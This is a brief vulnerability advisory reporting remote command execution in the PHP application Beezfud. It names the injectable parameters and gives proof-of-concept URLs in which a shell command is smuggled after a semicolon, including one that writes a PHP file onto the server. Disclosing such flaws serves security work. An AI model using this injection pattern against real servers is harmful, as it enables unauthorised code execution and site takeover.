Beezfud Remote Code Execution
Posted on 30 December 2015
================================================================================ # Beezfud Remote Code Execution ================================================================================ # Vendor Homepage: https://github.com/EVA-01/beezfud # Date: 23/12/2015 # Software Link: https://github.com/EVA-01/beezfud/archive/master.zip # Author: Ashiyane Digital Security Team # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/beezfud-exec.txt ================================================================================ # Vulnerable File : index.php # PoC : http://localhost/beezfud/index.php?parameter=;Command; Vulnerable Parameters : lookback , max , range , latest , earliest Example : http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo(); ?>' >info.php; ================================================================================ # Discovered By : Ehsan Hosseini (EhsanSec.ir) ================================================================================
